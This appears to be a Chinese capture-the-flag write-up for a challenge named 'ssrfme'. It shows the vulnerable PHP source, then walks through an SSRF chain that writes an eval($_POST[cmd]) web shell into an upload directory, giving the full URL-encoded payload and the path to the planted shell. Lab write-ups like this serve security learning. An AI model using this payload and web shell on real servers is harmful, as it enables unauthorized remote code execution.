http://bmzclub.cn/challenges#ssrfme
<?php
if(isset($_GET) && !empty($_GET)){
$url = $_GET['file'];
$path = "upload/".$_GET['path'];
}else{
show_source(__FILE__);
exit();
}
if(strpos($path,'..') > -1){
die('This is a waf!');
}
if(strpos($url,'http://127.0.0.1/') === 0){
file_put_contents($path, file_get_contents($url));
echo "console.log($path update successed!)";
}else{
echo "Hello.Geeker";
}关键点在这里
file_put_contents($path, file_get_contents($url));
echo "console.log($path update successed!)";file_put_contents()要写入的内容是file_get_contents($url)返回的内容
接下来看看如何构造才能使得file_get_contents返回带有shell的内容
?file=http://127.0.0.1/&path=<?php phpinfo();?>
查看源代码
echo "console.log($path update successed!)";这段代码使得我们传入的path参数会被写入到页面中
那么就可以构造
http://127.0.0.1/?file=http://127.0.0.1/&path=<?php eval($_POST[cmd]);?>这样file_get_contents($url)返回的内容里面就有我们想要写入的shell
将上面这段url编码一次,然后加上path变量传入的文件名即可构造完整的payload
?path=mochu.php&file=http%3a%2f%2f127.0.0.1%2f%3ffile%3dhttp%3a%2f%2f127.0.0.1%2f%26path%3d%3c%3fphp+eval(%24_POST%5bcmd%5d)%3b%3f%3e
访问http://www.bmzclub.cn:20351/upload/mochu.php即可
